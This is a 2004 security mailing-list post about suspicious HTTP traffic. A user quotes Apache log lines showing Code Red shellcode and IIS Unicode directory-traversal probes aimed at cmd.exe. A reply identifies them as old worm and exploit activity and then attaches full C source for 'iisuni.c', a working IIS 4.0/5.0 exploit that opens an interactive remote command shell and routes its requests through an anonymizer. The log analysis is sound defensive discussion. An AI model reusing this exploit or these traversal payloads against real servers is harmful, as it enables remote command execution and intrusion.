[Dshield] Suspect HTTP-activity

jayjwa jayjwa at atr2.ath.cx
Sat Jan 24 08:53:48 GMT 2004




On Fri, 23 Jan 2004, Martin Agren wrote:

> Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
> haven't publicly announced my web-server in any way -- I just use it for
> development of web-code and invite other developers to check it out.
>
> Most of these logs seems to indicate nothing actually happened
> (404-status), but I'm curious as to what it's all about and if anyone
> might be interested in this information. Any DShield-like service that
> collects apache-logs? ;-)


> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 308
> 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1"
> 404 320
> 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET
> /scripts/nsiislog.dll" 404 -
> 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 307
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 362
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329

I belive the "default ida" is a IIS Microsoft vulerability, used in a worm
that I've since long forgotten. The nsiislog.dll is, again IIS Microsoft
stuff. There exist many, many scripts and exploits to do this. You
probably got noticed by a script-kiddy or a worm momentarily. Check the
attachment, look familiar? I don't feel guilty for posting it in public
because it's very old, and all over, and you should be upgraded, and....

I got a wave of these on my Apache server. They seemed to stop when I
moved it off port 80, SSL'ed it, and stuck it up on 443. Apparently no one
looks up there =)


[jayjwa]RLF#37


-------------- next part --------------
/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */
/* coded by zipo */
/* to compile: cc -o iisuni iisuni.c */
/* made for all the lame populus :) */
/* Editor's Note: These guys go to all this trouble to write this, then fuck up the usage info, great! */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* this is the anonymous server used */
#define ANON "anon.free.anonymizer.com"
/* this are all the types of bugs */
#define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* this is the IIS http server port */
#define HTTP_PORT 80
int main (int argc, char *argv[]) {
   struct sockaddr_in sin;
   struct hostent *he;
   char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN];
   int sck, i;
   if (argc < 3)
     bad_params (argv[0]);
   switch (atoi(argv[2])) {
    case 1:
      bug = BUG1_STR;
      break;
    case 2:
      bug = BUG2_STR;
      break;
    case 3:
      bug = BUG3_STR;
      break;
    case 4:
      bug = BUG4_STR;
      break;
    default:
      printf ("Number error\n");
      exit(1);
   }
   while (1) {
      printf ("bash# ");
      fgets (cmd, sizeof(cmd), stdin);
      cmd[strlen(cmd)-1] = '\0';
      if (strcmp(cmd, "exit")) {
      	 if (!strcmp(cmd, "clear")) {
	    system("clear");
	    continue;
	 } else if (!strcmp(cmd, "")) {
	    continue;
	 } else if (!strcmp(cmd, "?")) {
	    printf ("Just you need to type in the prompt the M$DOS command\n");
	    printf ("to exit type \"exit\" :)\n");
	    continue;
	 }
	 /* prepare the string to be sent */
	 for (i=0;i<=strlen(cmd);i++) {
	    if (cmd[i] == 0x20)
	      cmd[i] = 0x2b;
	 }
	 sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
	 /* get ip */
	 if ((he = gethostbyname (ANON)) == NULL) {
	    herror ("host error");
	    exit (1);
	 }
	 /* setup port and other parameters */
	 sin.sin_port = htons (HTTP_PORT);
	 sin.sin_family = AF_INET;
	 memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
	 /* create a socket */
	 if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) {
	    perror ("socket() error");
	    exit (1);
	 }
	 /* connect to the sucker */
	 if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) {
	    perror ("connect() error");
	    exit (1);
	 }
	 /* send the beautifull string */
	 write (sck, buffer, sizeof(buffer));
	 /* recive all ! :) */
	 read (sck, recbuffer, sizeof(recbuffer));
	 /* and print it */
	 recbuffer[strlen(recbuffer)-1]='\0';
	 printf("\033[0;7m-------------------------------------Received-----------------------------------\n");
	 printf("%s\n---------------------------------------Done-------------------------------------\n\033[7;0m", recbuffer);
	 /* close the socket ... not needed any more */
	 close (sck);
	 /* put zero's in the buffers */
	 bzero (buffer, sizeof(buffer));
	 bzero (recbuffer, sizeof(recbuffer));
      } else {
	 /* you type "exit" cya :) */
	 exit(0);
      }
   }
}
/* you miss a parameter :'-( */
int bad_params (char *prog_name) {
   fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name);
   fprintf (stdout,"-------------------------------------------------------\n");
   fprintf (stdout, "<1> msadc\t");
   fprintf (stdout, "<2> scripts\t");
   fprintf (stdout, "<3> iisadmpwd\t");
   fprintf (stdout, "<4> /\n");
   fprintf (stdout,"-------------------------------------------------------\n");
   exit (1);
}
/* EOF */


More information about the list mailing list